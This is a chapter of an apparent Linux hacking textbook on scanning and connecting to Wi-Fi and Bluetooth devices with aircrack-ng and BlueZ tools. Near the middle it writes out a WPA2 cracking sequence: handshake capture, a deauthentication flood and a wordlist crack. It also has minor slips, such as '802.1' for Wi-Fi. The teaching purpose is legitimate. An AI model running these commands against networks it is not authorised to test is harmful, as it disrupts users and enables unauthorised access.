The ability to scan for and connect to other network devices from your system is crucial to becoming a successful hacker, and with wireless technologies like Wi-Fi (IEEE 802.1) and Bluetooth becoming the standard, finding and controlling Wi-Fi and Bluetooth connections is key. If someone can hack a wireless connection, they can gain entry to a device and access to confidential information. The first step, of course, is to learn how to find these devices.
In Chapter 3, we looked at some basic networking commands in Linux, including some of the fundamentals of wireless networking, with a promise of more wireless networking to come in Chapter 14. As promised, here we examine two of the most common wireless technologies in Linux: Wi-Fi and Bluetooth.
We’ll start with Wi-Fi. In this section, I’ll show you how to find, examine, and connect to Wi-Fi access points. Before doing so, let’s spend a bit of time going over some basic Wi-Fi terms and technologies to help you better understand the output from a lot of the queries we’ll make in this chapter:
AP (access point) This is the device wireless users connect to for internet access.
ESSID (extended service set identifier) This is the same as the SSID, which we discussed in Chapter 3, but it can be used for multiple APs in a wireless LAN.
BSSID (basic service set identifier) This is the unique identifier of each AP, and it is the same as the MAC address of the device.
SSID (service set identifier) This is the name of the network.
Channels Wi-Fi can operate on any one of 14 channels (1–14). In the United States, Wi-Fi is limited to channels 1–11.
Power The closer you are to the Wi-Fi AP, the greater the power, and the easier the connection is to crack.
Security This is the security protocol used on the Wi-Fi AP that is being read from. There are three primary security protocols for Wi-Fi. The original, Wired Equivalent Privacy (WEP), was badly flawed and easily cracked. Its replacement, Wi-Fi Protected Access (WPA), was a bit more secure. Finally, WPA2-PSK, which is much more secure and uses a preshared key (PSK) that all users share, is now used by nearly all Wi-Fi APs (except enterprise Wi-Fi).
Modes Wi-Fi can operate in one of three modes: managed, master, or monitor. You’ll learn what these modes mean in the following section.
Wireless range In the United States, a Wi-Fi AP must legally broadcast its signal at an upper limit of 0.5 watts. At this power, it has a normal range of about 300 feet (100 meters). High-gain antennas can extend this range to as much as 20 miles.
Frequency Wi-Fi is designed to operate on 2.4GHz and 5GHz. Modern Wi-Fi APs and wireless network cards often use both.
In Chapter 3, you were introduced to the basic Linux networking command ifconfig, which lists each activated network interface on your system along with some basic statistics, including (most importantly) the IP address of each interface. Let’s take another look at your results from running ifconfig and focus on the wireless connections this time.
kali >ifconfig
eth0Linkencap:EthernetHWaddr 00:0c:29:ba:82:0f
inet addr:192:168.181.131 Bcast:192.168.181.255 Mask:255.255.255.0
--snip--
lo Linkencap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
--snip--
➊ wlan0 Link encap:EthernetHWaddr 00:c0:ca:3f:ee:02
The Wi-Fi interface here is shown as wlan0 ➊. In Kali Linux, Wi-Fi interfaces are usually designated as wlanX, with X representing the number of that interface. In other words, the first Wi-Fi adapter on your system would be labeled wlan0, the second wlan1, and so on.
If you just want to see your Wi-Fi interfaces and their statistics, Linux has a specific command that’s similar to ifconfig but dedicated to wireless. That command is iwconfig. When you enter it, only your wireless interfaces and their key data are displayed:
kali >iwconfig
lo no wireless extensions
wlan0 IEEE 802.11bg ESSID:off/any
Mode:Managed Access Point:Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
eth0 no wireless extensions
Here, we see just the wireless interfaces, also known as network cards, and key data about them, including the wireless standard utilized, whether the ESSID is off, and the mode. The mode has three settings: managed, which means it is ready to join or has joined an AP; master, which means it is ready to act as or already is an AP; and monitor, which we’ll discuss a little later in the chapter. We can also see whether any client has associated with it and what its transmit power is, among other things. You can tell from this example that wlan0 is in the mode required to connect to a Wi-Fi network but is not connected to any yet. We will revisit this command again once the wireless interface is connected to a Wi-Fi network.
If you are not certain which Wi-Fi AP you want to connect to, you can see all the wireless access points your network card can reach using the iwlist command. The syntax for iwlist is as follows:
iwlist interface action
You can perform multiple actions with iwlist. For our purposes, we’ll use the scan action to see all the Wi-Fi APs in your area. (Note that with a standard antenna, your range will be 300–500 feet, but this can be extended with an inexpensive high-gain antenna.)
kali >iwlist wlan0 scan
wlan0 Scan completed:
Cell 01 - Address:88:AD:43:75:B3:82
Channel:1
Frequency:2.412GHz (Channel 1)
Quality=70/70 Signal level =-38 dBm
Encryption key:off
ESSID:"Hackers-Arise"
--snip--
The output from this command should include all Wi-Fi APs within range of your wireless interface, along with key data about each AP, such as the MAC address of the AP, the channel and frequency it is operating on, its quality, its signal level, whether its encryption key is enabled, and its ESSID.
You will need the MAC address of the target AP (BSSID), the MAC address of a client (another wireless network card), and the channel the AP is operating on in order to perform any kind of hacking, so this is valuable information.
Another command that is very useful in managing your Wi-Fi connections is nmcli (or the network manager command line interface). The Linux daemon that provides a high-level interface for the network interfaces (including the wireless ones) is known as the network manager. Generally, Linux users are familiar with this daemon from its graphical user interface (GUI), but it can also be used from the command line.
The nmcli command can be used to view the Wi-Fi APs near you and their key data, as we did with iwlist, but this command gives us a little more information. We use it in the format nmcli dev networktype, where dev is short for devices and the type (in this case) is wifi, like so:
kali >nmcli dev wifi
* SSID MODE CHAN RATE SIGNAL BARS SECURITY
Hackers-Arise Infra 1 54 Mbits/s 100 WPA1 WPA2
Xfinitywifi Infra 1 54 Mbits/s 75 WPA2
TPTV1 Infra 11 54 Mbits/s 44 WPA1 WPA2
--snip--
In addition to displaying the Wi-Fi APs within range and key data about them, including the SSID, the mode, the channel, the rate of transfer, the signal strength, and the security protocols enabled on the device, nmcli can be used connect to APs. The syntax to connect to an AP is as follows:
nmcli dev wifi connect AP-SSID password APpassword
So, based on the results from our first command, we know there is an AP with an SSID of Hackers-Arise. We also know it has WPA1 WPA2 security (this means that the AP is capable of using both the older WPA1 and the newer WPA2), which means we will have to provide the password to connect to the network. Fortunately, as it’s our AP, we know the password is 12345678, so we can enter the following:
kali >nmcli dev wifi connect Hackers-Arise password 12345678
Device 'wlan0' successfully activated with '394a5bf4-8af4-36f8-49beda6cb530'.
Try this on a network you know, and then when you have successfully connected to that wireless AP, run iwconfig again to see what has changed. Here’s my output from connecting to Hackers-Arise:
kali >iwconfig
lo no wireless extensions
wlan0 IEEE 802.11bg ESSID:"Hackers-Arise"
Mode:Managed Frequency:2.452GHz Access Point:00:25:9C:97:4F:48
Bit Rate=12 Mbs Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=64/70 Signal level=-46 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive reties:0 Invalid misc:13 Missed beacon:0
eth0 no wireless extensions
Note that now iwconfig has indicated that the ESSID is "Hackers-Arise" and that the AP is operating at a frequency of 2.452GHz. In a Wi-Fi network, it is possible for multiple APs to all be part of the same network, so there may be many APs that make up the Hackers-Arise network. The MAC address 00:25:9C:97:4F:48 is, as you might expect, the MAC of the AP I am connected to. What type of security a Wi-Fi network uses, whether it is running at 2.4GHz or 5GHz, what its ESSID is, and what the AP’s MAC address is are all critical pieces of information that are necessary for Wi-Fi hacking. Now that you know the basic commands, let’s get into some hacking.
One of the most popular exploits for new hackers to try is cracking Wi-Fi access points. As mentioned, before you can even consider attacking a Wi-Fi AP, you need the MAC address of the target AP (BSSID), the MAC address of a client, and the channel the AP is operating on.
We can get all that information and more using the tools of the aircrack-ng suite. I’ve mentioned this suite of Wi-Fi hacking tools a few times before, and now it’s time to actually use it. This suite of tools is included in every version of Kali, so you don’t need to download or install anything.
To use these tools effectively, you first need to put your wireless network card into monitor mode so that the card can see all the traffic passing its way. Normally, a network card captures only traffic destined specifically for that card. Monitor mode is similar to promiscuous mode on wired network cards.
To put your wireless network card in monitor mode, use the airmon-ng command from the aircrack-ng suite. The syntax for this command is simple:
airmon-ng start|stop|restart interface
So, if you want to put your wireless network card (designated wlan0) into monitor mode, you would enter the following:
kali >airmon-ng start wlan0
Found three processes that could cause trouble
If airodump-ng, aireplay-ng, or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'
--snip--
PHY INTERFACE DRIVER Chipset
phy0 wlan0 rt18187 Realtek Semiconductor Corop RTL8187
(mac8311 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
--snip--
The stop and restart commands, respectively, stop monitor mode and restart monitor mode if you run into trouble.
With your wireless card in monitor mode, you can access all the wireless traffic passing by you within the range of your wireless network adapter and antenna (standard is about 300–500 feet). Note that airmon-ng will rename your wireless interface: mine has been renamed “wlan0mon,” though yours may be different. Make certain to note the new designated name of your wireless because you’ll need that information in the next step.
Now we’ll use another tool from the aircrack-ng suite to find key data from the wireless traffic. The airodump-ng command captures and displays the key data from broadcasting APs and any clients connected to those APs or within the vicinity. The syntax here is straightforward: simply plug in airdump-ng, followed by the interface name you got from running airmon-ng just now. When you issue this command, your wireless card will pick up crucial information (listed next) from all the wireless traffic of the APs nearby:
BSSID The MAC address of the AP or client
PWR The strength of the signal
ENC The encryption used to secure the transmission
#Data The data throughput rate
CH The channel the AP is operating on
ESSID The name of the AP
kali >airodump-ng wlan0mon
CH 9][ Elapsed: 28 s ][ 2018-02-08 10:27
BSSID PWR Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID
01:01:AA:BB:CC:22 -1 4 26 0 10 54e WPA2 CCMP PSK Hackers-Arise
--snip--
BSSID Station PWR Rate Lost Frames Probe
(not associated) 01:01:AA:BB:CC:22
01:02:CC:DD:03:CF A0:A3:E2:44:7C:E5
Note that airodump-ng splits the output screen into an upper and lower portion. The upper portion has information on the broadcasting APs, including the BSSID, the power of the AP, how many beacon frames have been detected, the data throughput rate, how many packets have traversed the wireless card, the channel (1–14), the theoretical throughput limit, the encryption protocol, the cipher used for encryption, the authentication type, and the ESSID (commonly referred to as SSID). In the client portion, the output tells us that one client is not associated, meaning it has been detected but is not connected to any AP, and that another is associated with a station, meaning it’s connected to the AP at that address.
Now you have all the information you need to crack the AP! Although it’s beyond the scope of this book, to crack the wireless AP, you need the client MAC address, the AP MAC address, the channel the target is operating on, and a password list.
So to crack the Wi-Fi password, you would open three terminals. In the first terminal, you would enter commands similar to the following, filling in the client and AP MAC addresses and the channel:
airodump-ng -c 10 --bssid 01:01:AA:BB:CC:22 -w Hackers-ArisePSK wlan0mon
This command captures all the packets traversing the AP on channel 10 using the -c option.
In another terminal, you can use the aireplay-ng command to knock off (deauthenticate) anyone connected to the AP and force them to reauthenticate to the AP, as shown next. When they reauthenticate, you can capture the hash of their password that is exchanged in the WPA2-PSK four-way handshake. The password hash will appear in the upper-right corner of the airodump-ng terminal.
aireplay-ng --deauth 100 -a 01:01:AA:BB:CC:22-c A0:A3:E2:44:7C:E5 wlan0mon
Finally, in the final terminal, you can use a password list (wordlist.dic) to find the password in the captured hash (Hackers-ArisePSK.cap), as shown here:
aircrack-ng -w wordlist.dic -b 01:01:AA:BB:CC:22 Hacker-ArisePSK.cap
These days, nearly every gadget, mobile device, and system has Bluetooth built in, including our computers, smartphones, iPods, tablets, speakers, game controllers, keyboards, and many other devices. Being able to hack Bluetooth can lead to the compromise of any information on the device, control of the device, and the ability to send unwanted info to and from the device, among other things.
To exploit the technology, we need to understand how it works. An in-depth understanding of Bluetooth is beyond the scope of this book, but I will give you some basic knowledge that will help you scan for and connect to Bluetooth devices in preparation for hacking them.
Bluetooth is a universal protocol for low-power, near-field communication operating at 2.4–2.485GHz using spread spectrum, frequency hopping at 1,600 hops per second (this frequency hopping is a security measure). It was developed in 1994 by Ericsson Corp. of Sweden and named after the 10th-century Danish king Harald Bluetooth (note that Sweden and Denmark were a single country in the 10th century).
The Bluetooth specification has a minimum range of 10 meters, but there is no limit to the upper range manufacturers may implement in their devices. Many devices have ranges as large as 100 meters. With special antennas, that range can be extended even farther.
Connecting two Bluetooth devices is referred to as pairing. Pretty much any two Bluetooth devices can connect to each other, but they can pair only if they are in discoverable mode. A Bluetooth device in discoverable mode transmits the following information:
When the two devices pair, they exchange a secret or link key. Each stores this link key so it can identify the other in future pairings.
Every device has a unique 48-bit identifier (a MAC-like address) and usually a manufacturer-assigned name. These will be useful pieces of data when we want to identify and access a device.
Linux has an implementation of the Bluetooth protocol stack called BlueZ that we’ll use to scan for Bluetooth signals. Most Linux distributions, including Kali Linux, have it installed by default. If yours doesn’t, you can usually find it in your repository using the following command:
kali >apt-get install bluez
BlueZ has a number of simple tools we can use to manage and scan Bluetooth devices, including the following:
hciconfig This tool operates very similarly to ifconfig in Linux, but for Bluetooth devices. As you can see in Listing 14-1, I have used it to bring up the Bluetooth interface and query the device for its specs.
hcitool This inquiry tool can provide us with device name, device ID, device class, and device clock information, which enables the devices to work synchronously.
hcidump This tool enables us to sniff the Bluetooth communication, meaning we can capture data sent over the Bluetooth signal.
The first scanning and reconnaissance step with Bluetooth is to check whether the Bluetooth adapter on the system we’re using is recognized and enabled so we can use it to scan for other devices. We can do this with the built-in BlueZ tool hciconfig, as shown in Listing 14-1.
kali >hciconfig
hci0: Type: BR/EDR Bus: USB
BD Address: 10:AE:60:58:F1:37 ACL MTU: 310:10 SCO MTU: 64:8
UP RUNNING PSCAN INQUIRY
RX bytes:131433 acl:45 sco:0 events:10519 errors:0
TX bytes:42881 acl:45 sco:0 commands:5081 errors:0
Listing 14-1: Scanning for a Bluetooth device
As you can see, my Bluetooth adapter is recognized with a MAC address of 10:AE:60:58:F1:37. This adapter has been named hci0. The next step is to check that the connection is enabled, which we can also do with hciconfig by providing the name and the up command:
kali >hciconfig hci0 up
If the command runs successfully, we should see no output, just a new prompt.
Good, hci0 is up and ready! Let’s put it to work.
Now that we know our adapter is up, we can use another tool in the BlueZ suite called hcitool, which is used to scan for other Bluetooth devices within range.
Let’s first use the scanning function of this tool to look for Bluetooth devices that are sending out their discover beacons, meaning they’re in discovery mode, with the simple scan command shown in Listing 14-2.
kali >hcitool scan
Scanning...
72:6E:46:65:72:66 ANDROID BT
22:C5:96:08:5D:32 SCH-I535
Listing 14-2: Scanning for Bluetooth devices in discovery mode
As you can see, on my system, hcitool found two devices, ANDROID BT and SCH-I535. Yours will likely provide you with different output depending on what devices you have around. For testing purposes, try putting your phone or other Bluetooth device in discovery mode and see if it gets picked up in the scan.
Now let’s gather more information about the detected devices with the inquiry function inq:
kali >hcitool inq
Inquiring...
24:C6:96:08:5D:33 clock offset:0x4e8b class:0x5a020c
76:6F:46:65:72:67 clock offset:0x21c0 class:0x5a020c
This gives us the MAC addresses of the devices, the clock offset, and the class of the devices. The class indicates what type of Bluetooth device you found, and you can look up the code and see what type of device it is by going to the Bluetooth SIG site at https://www.bluetooth.org/en-us/specification/assigned-numbers/service-discovery/.
The tool hcitool is a powerful command line interface to the Bluetooth stack that can do many, many things. Listing 14-3 shows the help page with some of the commands you can use. Take a look at the help page yourself to see the full list.
kali >hcitool --help
hcitool - HCI Tool ver 4.99
Usage:
hcitool [options] <command> [command parameters]
Options:
--help Display help
-i dev HCI device
Commands
dev Display local devices
inq Inquire remote devices
scan Scan for remote devices
name Get name from remote devices
--snip--
Listing 14-3: Some hcitool commands
Many Bluetooth-hacking tools you’ll see around simply use these commands in a script, and you can easily create your own tool by using these commands in your own bash or Python script—we’ll look at scripting in Chapter 17.
Service Discovery Protocol (SDP) is a Bluetooth protocol for searching for Bluetooth services (Bluetooth is suite of services), and, helpfully, BlueZ provides the sdptool tool for browsing a device for the services it provides. It is also important to note that the device does not have to be in discovery mode to be scanned. The syntax is as follows:
sdptool browse MACaddress
Listing 14-4 shows me using sdptool to search for services on one of the devices detected earlier in Listing 14-2.
kali >sdptool browse 76:6E:46:63:72:66
Browsing 76:6E:46:63:72:66...
Service RecHandle: 0x10002
Service Class ID List:
""(0x1800)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 31
"ATT" (0x0007)
uint16: 0x1
uint16: 0x5
--snip--
Listing 14-4: Scanning with sdptool
Here, we can see that the sdptool tool was able to pull information on all the services this device is capable of using. In particular, we see that this device supports the ATT Protocol, which is the Low Energy Attribute Protocol. This can provide us more clues as to what the device is and possibly potential avenues to interact with it further.
Once we’ve gathered the MAC addresses of all nearby devices, we can send out pings to these devices, whether they’re in discovery mode or not, to see whether they are in reach. This lets us know whether they are active and within range. To send out a ping, we use the l2ping command with the following syntax:
l2ping MACaddress
Listing 14-5 shows me pinging the Android device discovered in Listing 14-2.
kali >l2ping 76:6E:46:63:72:66 -c 4
Ping: 76:6E:46:63:72:66 from 10:AE:60:58:F1:37 (data size 44)...
44 bytes 76:6E:46:63:72:66 id 0 time 37.57ms
44 bytes 76:6E:46:63:72:66 id 1 time 27.23ms
44 bytes 76:6E:46:63:72:66 id 2 time 27.59ms
--snip--
Listing 14-5: Pinging a Bluetooth device
This output indicates that the device with the MAC address 76:6E:46:63:72:66 is within range and reachable. This is useful knowledge, because we must know whether a device is reachable before we even contemplate hacking it.
Wireless devices represent the future of connectivity and hacking. Linux has developed specialized commands for scanning and connecting to Wi-Fi APs in the first step toward hacking those systems. The aircrack-ng suite of wireless hacking tools includes both airmon-ng and airodump-ng, which enable us to scan and gather key information from in-range wireless devices. The BlueZ suite includes hciconfig, hcitool, and other tools capable of scanning and information gathering, which are necessary for hacking the Bluetooth devices within range. It also includes many other tools worth exploring.